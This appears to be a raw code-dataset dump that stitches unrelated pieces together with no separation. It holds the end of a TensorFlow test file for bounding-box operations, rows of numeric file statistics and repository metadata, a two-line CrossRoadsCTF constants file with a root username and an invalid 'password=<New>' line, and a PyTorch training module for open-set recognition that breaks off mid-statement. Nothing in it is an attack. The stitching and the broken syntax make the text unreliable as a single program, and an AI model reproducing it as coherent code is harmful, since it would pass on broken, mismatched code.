self.assertNDArrayNear(filtered_boxes_tpu, filtered_boxes_np, 1e-5)
self.assertNDArrayNear(filtered_scores_tpu, filtered_scores_np, 1e-5)
class FilterBoxesByScoresTest(tf.test.TestCase):
def test_filter_boxes_by_scores_batch(self):
# boxes -> [[small, good, outside], [outside, small, good]]
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
[4.0, 1.0, 7.0, 4.0]]])
filtered_boxes_np = np.array([[[0.0, 0.0, 0.0, 0.0], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0],
[4.0, 1.0, 7.0, 4.0]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
scores_np = np.array([[0.1, 0.7, 0.6], [0.11, 0.22, 0.53]])
filtered_scores_np = np.array([[-1.0, 0.7, 0.6], [-1.0, -1.0, 0.53]])
scores = tf.constant(scores_np, dtype=tf.float32)
min_score_threshold = 0.5
def test_fn(boxes, scores):
filtered_boxes, filtered_scores = box_ops.filter_boxes_by_scores(
boxes, scores, min_score_threshold)
return filtered_boxes, filtered_scores
filtered_results_tpu, filtered_results_cpu = _transform_boxes_on_tpu_and_cpu(
test_fn, boxes, scores)
filtered_boxes_tpu, filtered_scores_tpu = filtered_results_tpu
filtered_boxes_cpu, filtered_scores_cpu = filtered_results_cpu
self.assertNDArrayNear(filtered_boxes_tpu, filtered_boxes_cpu, 1e-5)
self.assertNDArrayNear(filtered_scores_tpu, filtered_scores_cpu, 1e-5)
self.assertNDArrayNear(filtered_boxes_tpu, filtered_boxes_np, 1e-5)
self.assertNDArrayNear(filtered_scores_tpu, filtered_scores_np, 1e-5)
class GatherInstancesTest(tf.test.TestCase):
def test_gather_instances(self):
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
[4.0, 1.0, 7.0, 4.0]]])
indices_np = np.array([[2, 0], [0, 1]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
indices = tf.constant(indices_np, dtype=tf.int32)
selected_boxes = box_ops.gather_instances(indices, boxes)
expected_selected_boxes = np.array(
[[[7.0, 4.0, 9.5, 6.5], [1.0, 2.0, 1.5, 2.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0]]])
self.assertNDArrayNear(expected_selected_boxes, selected_boxes, 1e-5)
def test_gather_instances_with_multiple_inputs(self):
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
[4.0, 1.0, 7.0, 4.0]]])
classes_np = np.array([[1, 2, 3], [20, 30, 40]])
indices_np = np.array([[2, 0], [0, 1]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
classes = tf.constant(classes_np, dtype=tf.int32)
indices = tf.constant(indices_np, dtype=tf.int32)
selected_boxes, selected_classes = box_ops.gather_instances(
indices, boxes, classes)
expected_selected_boxes = np.array(
[[[7.0, 4.0, 9.5, 6.5], [1.0, 2.0, 1.5, 2.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0]]])
expected_selected_classes = np.array(
[[3, 1], [20, 30]])
self.assertNDArrayNear(expected_selected_boxes, selected_boxes, 1e-5)
self.assertAllEqual(expected_selected_classes, selected_classes)
class TopKBoxesTest(tf.test.TestCase):
def test_top_k_boxes_batch1(self):
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
scores_np = np.array([[0.9, 0.5, 0.7]])
scores = tf.constant(scores_np, dtype=tf.float32)
top_k_boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [7.0, 4.0, 9.5, 6.5]]])
top_k_scores_np = np.array([[0.9, 0.7]])
def test_fn(boxes, scores):
top_k_boxes, top_k_scores = box_ops.top_k_boxes(boxes, scores, k=2)
return top_k_boxes, top_k_scores
top_k_results_tpu, top_k_results_cpu = _transform_boxes_on_tpu_and_cpu(
test_fn, boxes, scores)
top_k_boxes_tpu, top_k_scores_tpu = top_k_results_tpu
top_k_boxes_cpu, top_k_scores_cpu = top_k_results_cpu
self.assertNDArrayNear(top_k_boxes_tpu, top_k_boxes_cpu, 1e-5)
self.assertNDArrayNear(top_k_scores_tpu, top_k_scores_cpu, 1e-5)
self.assertNDArrayNear(top_k_boxes_tpu, top_k_boxes_np, 1e-5)
self.assertNDArrayNear(top_k_scores_tpu, top_k_scores_np, 1e-5)
def test_top_k_boxes_batch2(self):
boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5],
[7.0, 4.0, 9.5, 6.5]],
[[-2.0, 5.0, 0.0, 7.5], [5.0, 6.0, 5.1, 6.0],
[4.0, 1.0, 7.0, 4.0]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
scores_np = np.array([[0.9, 0.7, 0.5], [0.11, 0.22, 0.33]])
scores = tf.constant(scores_np, dtype=tf.float32)
top_k_boxes_np = np.array([[[1.0, 2.0, 1.5, 2.5], [2.0, 3.0, 4.5, 5.5]],
[[4.0, 1.0, 7.0, 4.0], [5.0, 6.0, 5.1, 6.0]]])
top_k_scores_np = np.array([[0.9, 0.7], [0.33, 0.22]])
def test_fn(boxes, scores):
top_k_boxes, top_k_scores = box_ops.top_k_boxes(boxes, scores, k=2)
return top_k_boxes, top_k_scores
top_k_results_tpu, top_k_results_cpu = _transform_boxes_on_tpu_and_cpu(
test_fn, boxes, scores)
top_k_boxes_tpu, top_k_scores_tpu = top_k_results_tpu
top_k_boxes_cpu, top_k_scores_cpu = top_k_results_cpu
self.assertNDArrayNear(top_k_boxes_tpu, top_k_boxes_cpu, 1e-5)
self.assertNDArrayNear(top_k_scores_tpu, top_k_scores_cpu, 1e-5)
self.assertNDArrayNear(top_k_boxes_tpu, top_k_boxes_np, 1e-5)
self.assertNDArrayNear(top_k_scores_tpu, top_k_scores_np, 1e-5)
class BboxeOverlapTest(tf.test.TestCase):
def testBBoxeOverlapOpCorrectness(self):
boxes_data = [[[0, 0, 0.1, 1], [0, 0.2, 0.2, 1.2], [0, 0.3, 0.3, 1.3],
[0, 0.5, 0.4, 1.5], [0, 0.7, 0.5, 1.7], [0, 0.9, 0.6, 1.9],
[0, 0.1, 0.1, 1.1], [0, 0.3, 0.7, 1.3], [0, 0.9, 2, 1.9]],
[[0, 0, 1, 0.2], [0, 0.2, 0.5, 1.2], [0, 0.4, 0.9, 1.4],
[0, 0.6, 1.1, 1.6], [0, 0.8, 1.2, 1.8], [0, 1, 1.5, 2],
[0, 0.5, 1, 1], [0.5, 0.8, 1, 1.8], [-1, -1, -1, -1]]]
boxes_np = np.array(boxes_data, dtype=np.float32)
gt_boxes_data = [[[0, 0.1, 0.1, 1.1], [0, 0.3, 0.7, 1.3], [0, 0.9, 2, 1.9]],
[[0, 0.5, 1, 1], [0.5, 0.8, 1, 1.8], [-1, -1, -1, -1]]]
gt_boxes_np = np.array(gt_boxes_data, dtype=np.float32)
# Runs on TPU.
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
boxes = tf.constant(boxes_np)
gt_boxes = tf.constant(gt_boxes_np)
iou = box_ops.bbox_overlap(boxes=boxes, gt_boxes=gt_boxes)
iou = iou.numpy()
self.assertEqual(iou.shape, (2, 9, 3))
self.assertAllEqual(
np.argmax(iou, axis=2),
[[0, 0, 1, 1, 1, 2, 0, 1, 2], [0, 0, 0, 0, 1, 1, 0, 1, 0]])
def testBBoxeOverlapOpCheckShape(self):
batch_size = 2
rpn_post_nms_topn = 2000
gt_max_instances = 100
boxes_np = np.random.rand(batch_size, rpn_post_nms_topn,
4).astype(np.float32)
gt_boxes_np = np.random.rand(batch_size, gt_max_instances,
4).astype(np.float32)
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
boxes = tf.constant(boxes_np)
gt_boxes = tf.constant(gt_boxes_np)
iou = box_ops.bbox_overlap(boxes=boxes, gt_boxes=gt_boxes)
iou = iou.numpy()
self.assertEqual(iou.shape,
(batch_size, (rpn_post_nms_topn), gt_max_instances))
def testBBoxeOverlapOpCorrectnessWithNegativeData(self):
boxes_data = [[[0, -0.01, 0.1, 1.1], [0, 0.2, 0.2, 5.0],
[0, -0.01, 0.1, 1.], [-1, -1, -1, -1]]]
boxes_np = np.array(boxes_data, dtype=np.float32)
gt_boxes_np = boxes_np
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
boxes = tf.constant(boxes_np)
gt_boxes = tf.constant(gt_boxes_np)
iou = box_ops.bbox_overlap(boxes=boxes, gt_boxes=gt_boxes)
iou = iou.numpy()
expected = np.array([[[0.99999994, 0.0917431, 0.9099099, -1.],
[0.0917431, 1., 0.08154944, -1.],
[0.9099099, 0.08154944, 1., -1.],
[-1., -1., -1., -1.]]])
self.assertAllClose(expected, iou)
class BoxMatchingTest(tf.test.TestCase):
def test_box_matching_single(self):
boxes_np = np.array(
[[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
[5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
gt_boxes_np = np.array(
[[[10, 10, 15, 15], [2.5, 2.5, 7.5, 7.5],
[-1, -1, -1, -1]]])
gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
gt_classes_np = np.array([[2, 10, -1]])
gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
matched_gt_boxes_np = np.array(
[[[2.5, 2.5, 7.5, 7.5],
[2.5, 2.5, 7.5, 7.5],
[2.5, 2.5, 7.5, 7.5],
[10, 10, 15, 15]]])
matched_gt_classes_np = np.array([[10, 10, 10, 2]])
matched_gt_indices_np = np.array([[1, 1, 1, 0]])
matched_iou_np = np.array(
[[0.142857142857, 1.0, 0.142857142857, 0.142857142857]])
iou_np = np.array(
[[[0, 0.142857142857, -1.0],
[0, 1.0, -1.0],
[0, 0.142857142857, -1.0],
[0.142857142857, 0, -1.0]]])
# Runs on TPU.
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
(matched_gt_boxes_tpu, matched_gt_classes_tpu,
matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# Runs on CPU.
(matched_gt_boxes_cpu, matched_gt_classes_cpu,
matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# consistency.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
# correctness.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_np, 1e-5)
def test_box_matching_single_no_gt(self):
boxes_np = np.array(
[[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
[5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
gt_boxes_np = np.array(
[[[-1, -1, -1, -1],
[-1, -1, -1, -1],
[-1, -1, -1, -1]]])
gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
gt_classes_np = np.array([[-1, -1, -1]])
gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
matched_gt_boxes_np = np.array(
[[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]])
matched_gt_classes_np = np.array([[0, 0, 0, 0]])
matched_gt_indices_np = np.array([[-1, -1, -1, -1]])
matched_iou_np = np.array([[-1, -1, -1, -1]])
iou_np = np.array(
[[[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1]]])
# Runs on TPU.
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
(matched_gt_boxes_tpu, matched_gt_classes_tpu,
matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# Runs on CPU.
(matched_gt_boxes_cpu, matched_gt_classes_cpu,
matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# consistency.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
# correctness.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_np, 1e-5)
def test_box_matching_batch(self):
boxes_np = np.array(
[[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
[5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]],
[[0, 0, 5, 5], [2.5, 2.5, 7.5, 7.5],
[5, 5, 10, 10], [7.5, 7.5, 12.5, 12.5]]])
boxes = tf.constant(boxes_np, dtype=tf.float32)
gt_boxes_np = np.array(
[[[10, 10, 15, 15], [2.5, 2.5, 7.5, 7.5], [-1, -1, -1, -1]],
[[-1, -1, -1, -1], [-1, -1, -1, -1], [-1, -1, -1, -1]]])
gt_boxes = tf.constant(gt_boxes_np, dtype=tf.float32)
gt_classes_np = np.array([[2, 10, -1], [-1, -1, -1]])
gt_classes = tf.constant(gt_classes_np, dtype=tf.int32)
matched_gt_boxes_np = np.array(
[[[2.5, 2.5, 7.5, 7.5],
[2.5, 2.5, 7.5, 7.5],
[2.5, 2.5, 7.5, 7.5],
[10, 10, 15, 15]],
[[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]])
matched_gt_classes_np = np.array(
[[10, 10, 10, 2],
[0, 0, 0, 0]])
matched_gt_indices_np = np.array(
[[1, 1, 1, 0],
[-1, -1, -1, -1]])
matched_iou_np = np.array(
[[0.142857142857, 1.0, 0.142857142857, 0.142857142857],
[-1, -1, -1, -1]])
iou_np = np.array(
[[[0, 0.142857142857, -1.0],
[0, 1.0, -1.0],
[0, 0.142857142857, -1.0],
[0.142857142857, 0, -1.0]],
[[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1],
[-1, -1, -1]]])
# Runs on TPU.
strategy = tf.distribute.experimental.TPUStrategy()
with strategy.scope():
(matched_gt_boxes_tpu, matched_gt_classes_tpu,
matched_gt_indices_tpu, matched_iou_tpu, iou_tpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# Runs on CPU.
(matched_gt_boxes_cpu, matched_gt_classes_cpu,
matched_gt_indices_cpu, matched_iou_cpu, iou_cpu) = (
box_ops.box_matching(boxes, gt_boxes, gt_classes))
# consistency.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_cpu.numpy(), 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_cpu.numpy())
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_cpu.numpy())
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_cpu.numpy(), 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_cpu.numpy(), 1e-5)
# correctness.
self.assertNDArrayNear(
matched_gt_boxes_tpu.numpy(), matched_gt_boxes_np, 1e-5)
self.assertAllEqual(
matched_gt_classes_tpu.numpy(), matched_gt_classes_np)
self.assertAllEqual(
matched_gt_indices_tpu.numpy(), matched_gt_indices_np)
self.assertNDArrayNear(
matched_iou_tpu.numpy(), matched_iou_np, 1e-5)
self.assertNDArrayNear(
iou_tpu.numpy(), iou_np, 1e-5)
if __name__ == '__main__':
tf.test.main()
| 42.754651 | 81 | 0.600098 | 5,722 | 36,769 | 3.623908 | 0.048235 | 0.019194 | 0.014323 | 0.014853 | 0.836854 | 0.812645 | 0.800347 | 0.790461 | 0.776717 | 0.767988 | 0 | 0.11406 | 0.238652 | 36,769 | 859 | 82 | 42.804424 | 0.62667 | 0.030216 | 0 | 0.744428 | 0 | 0 | 0.000225 | 0 | 0 | 0 | 0 | 0 | 0.157504 | 1 | 0.069837 | false | 0 | 0.004458 | 0.001486 | 0.104012 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f22926bc6de47c6de6f7c6fbad88ec089cbe7761 | 40 | py | Python | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | null | null | null | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | null | null | null | CrossRoads/Constant.py | Bamgm14/CrossRoadsCTF | a49840f94dc90874282ccb49a8be27b51aa1f097 | [
"MIT"
] | 1 | 2021-11-27T05:43:23.000Z | 2021-11-27T05:43:23.000Z | user="root"
password=<New>
ip="0.0.0.0"
| 10 | 14 | 0.625 | 9 | 40 | 2.777778 | 0.666667 | 0.24 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 0.075 | 40 | 3 | 15 | 13.333333 | 0.567568 | 0 | 0 | 0 | 0 | 0 | 0.275 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.333333 | 0 | null | null | 0 | 1 | 1 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f23c65d40cbe6f548c55b4f5beb397a9485e1f36 | 13,430 | py | Python | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 73 | 2019-10-31T13:46:02.000Z | 2022-03-31T04:40:32.000Z | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 4 | 2019-11-19T16:31:02.000Z | 2021-03-26T08:17:35.000Z | lib/Training/train.py | MrtnMndt/Deep_Openset_Recognition_through_Uncertainty | 88ae1d5e36457ad53223c0a3a461582aacbb34aa | [
"MIT"
] | 21 | 2019-11-20T01:38:52.000Z | 2022-02-24T12:29:29.000Z | import time
import torch
from lib.Utility.metrics import AverageMeter
from lib.Utility.metrics import accuracy
def train(Dataset, model, criterion, epoch, optimizer, writer, device, args):
"""
Trains/updates the model for one epoch on the training dataset.
Parameters:
Dataset (torch.utils.data.Dataset): The dataset
model (torch.nn.module): Model to be trained
criterion (torch.nn.criterion): Loss function
epoch (int): Continuous epoch counter
optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
writer (tensorboard.SummaryWriter): TensorBoard writer instance
device (str): device name where data is transferred to
args (dict): Dictionary of (command line) arguments.
Needs to contain print_freq (int), denoising_noise_value (float) and var_beta (float).
"""
# Create instances to accumulate losses etc.
losses = AverageMeter()
batch_time = AverageMeter()
data_time = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
# train
for i, (inp, target) in enumerate(Dataset.train_loader):
inp = inp.to(device)
target = target.to(device)
# measure data loading time
data_time.update(time.time() - end)
# compute model forward
output = model(inp)
# calculate loss
loss = criterion(output, target)
# record precision/accuracy and losses
prec1 = accuracy(output, target)[0]
top1.update(prec1.item(), inp.size(0))
losses.update(loss.item(), inp.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print progress
if i % args.print_freq == 0:
print('Training: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=top1))
# TensorBoard summary logging
writer.add_scalar('training/train_precision@1', top1.avg, epoch)
writer.add_scalar('training/train_class_loss', losses.avg, epoch)
writer.add_scalar('training/train_average_loss', losses.avg, epoch)
print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_var(Dataset, model, criterion, epoch, optimizer, writer, device, args):
"""
Trains/updates the model for one epoch on the training dataset.
Parameters:
Dataset (torch.utils.data.Dataset): The dataset
model (torch.nn.module): Model to be trained
criterion (torch.nn.criterion): Loss function
epoch (int): Continuous epoch counter
optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
writer (tensorboard.SummaryWriter): TensorBoard writer instance
device (str): device name where data is transferred to
args (dict): Dictionary of (command line) arguments.
Needs to contain print_freq (int), denoising_noise_value (float) and var_beta (float).
"""
# Create instances to accumulate losses etc.
cl_losses = AverageMeter()
kld_losses = AverageMeter()
losses = AverageMeter()
batch_time = AverageMeter()
data_time = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
# train
for i, (inp, target) in enumerate(Dataset.train_loader):
inp = inp.to(device)
target = target.to(device)
# measure data loading time
data_time.update(time.time() - end)
# compute model forward
output_samples, mu, std = model(inp)
# calculate loss
cl_loss, kld_loss = criterion(output_samples, target, mu, std, device)
# add the individual loss components together and weight the KL term.
loss = cl_loss + args.var_beta * kld_loss
# take mean to compute accuracy. Note if variational samples are 1 this only gets rid of a dummy dimension.
output = torch.mean(output_samples, dim=0)
# record precision/accuracy and losses
prec1 = accuracy(output, target)[0]
top1.update(prec1.item(), inp.size(0))
losses.update((cl_loss + kld_loss).item(), inp.size(0))
cl_losses.update(cl_loss.item(), inp.size(0))
kld_losses.update(kld_loss.item(), inp.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print progress
if i % args.print_freq == 0:
print('Training: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'KL {KLD_loss.val:.4f} ({KLD_loss.avg:.4f})'.format(
epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, cl_loss=cl_losses, top1=top1, KLD_loss=kld_losses))
# TensorBoard summary logging
writer.add_scalar('training/train_precision@1', top1.avg, epoch)
writer.add_scalar('training/train_class_loss', cl_losses.avg, epoch)
writer.add_scalar('training/train_average_loss', losses.avg, epoch)
writer.add_scalar('training/train_KLD', kld_losses.avg, epoch)
print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_joint(Dataset, model, criterion, epoch, optimizer, writer, device, args):
"""
Trains/updates the model for one epoch on the training dataset.
Parameters:
Dataset (torch.utils.data.Dataset): The dataset
model (torch.nn.module): Model to be trained
criterion (torch.nn.criterion): Loss function
epoch (int): Continuous epoch counter
optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
writer (tensorboard.SummaryWriter): TensorBoard writer instance
device (str): device name where data is transferred to
args (dict): Dictionary of (command line) arguments.
Needs to contain print_freq (int), denoising_noise_value (float) and var_beta (float).
"""
# Create instances to accumulate losses etc.
class_losses = AverageMeter()
recon_losses = AverageMeter()
losses = AverageMeter()
batch_time = AverageMeter()
data_time = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
# train
for i, (inp, target) in enumerate(Dataset.train_loader):
inp = inp.to(device)
class_target = target.to(device)
recon_target = inp
# measure data loading time
data_time.update(time.time() - end)
# compute model forward
class_output, recon_output = model(inp)
# calculate loss
class_loss, recon_loss = criterion(class_output, class_target, recon_output, recon_target)
# add the individual loss components together
loss = class_loss + recon_loss
# record precision/accuracy and losses
prec1 = accuracy(class_output, class_target)[0]
top1.update(prec1.item(), inp.size(0))
losses.update((class_loss + recon_loss).item(), inp.size(0))
class_losses.update(class_loss.item(), inp.size(0))
recon_losses.update(recon_loss.item(), inp.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print progress
if i % args.print_freq == 0:
print('Training: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Recon Loss {recon_loss.val:.4f} ({recon_loss.avg:.4f})'.format(
epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
cl_loss=class_losses, top1=top1, recon_loss=recon_losses))
# TensorBoard summary logging
writer.add_scalar('training/train_precision@1', top1.avg, epoch)
writer.add_scalar('training/train_average_loss', losses.avg, epoch)
writer.add_scalar('training/train_class_loss', class_losses.avg, epoch)
writer.add_scalar('training/train_recon_loss', recon_losses.avg, epoch)
print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
def train_var_joint(Dataset, model, criterion, epoch, optimizer, writer, device, args):
"""
Trains/updates the model for one epoch on the training dataset.
Parameters:
Dataset (torch.utils.data.Dataset): The dataset
model (torch.nn.module): Model to be trained
criterion (torch.nn.criterion): Loss function
epoch (int): Continuous epoch counter
optimizer (torch.optim.optimizer): optimizer instance like SGD or Adam
writer (tensorboard.SummaryWriter): TensorBoard writer instance
device (str): device name where data is transferred to
args (dict): Dictionary of (command line) arguments.
Needs to contain print_freq (int), denoising_noise_value (float) and var_beta (float).
"""
# Create instances to accumulate losses etc.
class_losses = AverageMeter()
recon_losses = AverageMeter()
kld_losses = AverageMeter()
losses = AverageMeter()
batch_time = AverageMeter()
data_time = AverageMeter()
top1 = AverageMeter()
# switch to train mode
model.train()
end = time.time()
# train
for i, (inp, target) in enumerate(Dataset.train_loader):
inp = inp.to(device)
class_target = target.to(device)
recon_target = inp
# measure data loading time
data_time.update(time.time() - end)
# compute model forward
class_samples, recon_samples, mu, std = model(inp)
# calculate loss
class_loss, recon_loss, kld_loss = criterion(class_samples, class_target, recon_samples, recon_target,
mu, std, device)
# add the individual loss components together and weight the KL term.
loss = class_loss + recon_loss + args.var_beta * kld_loss
# take mean to compute accuracy. Note if variational samples are 1 this only gets rid of a dummy dimension.
output = torch.mean(class_samples, dim=0)
# record precision/accuracy and losses
prec1 = accuracy(output, class_target)[0]
top1.update(prec1.item(), inp.size(0))
losses.update((class_loss + recon_loss + kld_loss).item(), inp.size(0))
class_losses.update(class_loss.item(), inp.size(0))
recon_losses.update(recon_loss.item(), inp.size(0))
kld_losses.update(kld_loss.item(), inp.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print progress
if i % args.print_freq == 0:
print('Training: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Class Loss {cl_loss.val:.4f} ({cl_loss.avg:.4f})\t'
'Prec@1 {top1.val:.3f} ({top1.avg:.3f})\t'
'Recon Loss {recon_loss.val:.4f} ({recon_loss.avg:.4f})\t'
